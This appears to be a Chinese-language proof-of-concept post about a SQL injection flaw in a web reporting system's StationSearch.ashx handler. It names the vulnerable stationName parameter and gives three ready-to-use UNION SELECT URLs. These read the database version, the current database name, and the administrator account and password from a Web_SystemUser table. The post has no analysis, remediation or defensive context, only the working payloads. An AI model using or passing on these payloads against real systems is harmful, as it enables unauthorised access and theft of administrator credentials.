```
注入链接:/Report/AjaxHandle/StationChoose/StationSearch.ashx?stationName=1&stationType='KKK'&sqlWhere=
注入参数:stationName
【获取数据库版本】/Report/AjaxHandle/StationChoose/StationSearch.ashx?stationName=')+and+1=2++union+all+select+(@@version),NULL--&stationType='KKK'&sqlWhere=
【获取当前数据库】/Report/AjaxHandle/StationChoose/StationSearch.ashx?stationName=')+and+1=2++union+all+select+(db_name()),NULL--&stationType='KKK'&sqlWhere=
【管理员账号密码】/Report/AjaxHandle/StationChoose/StationSearch.ashx?stationName=')+and+1=2++union+all+select+(select+top+1+UserID%2b'|'%2bUserPwd+from+strongmain.dbo.Web_SystemUser),NULL--&stationType='KKK'&sqlWhere=
```


暂无评论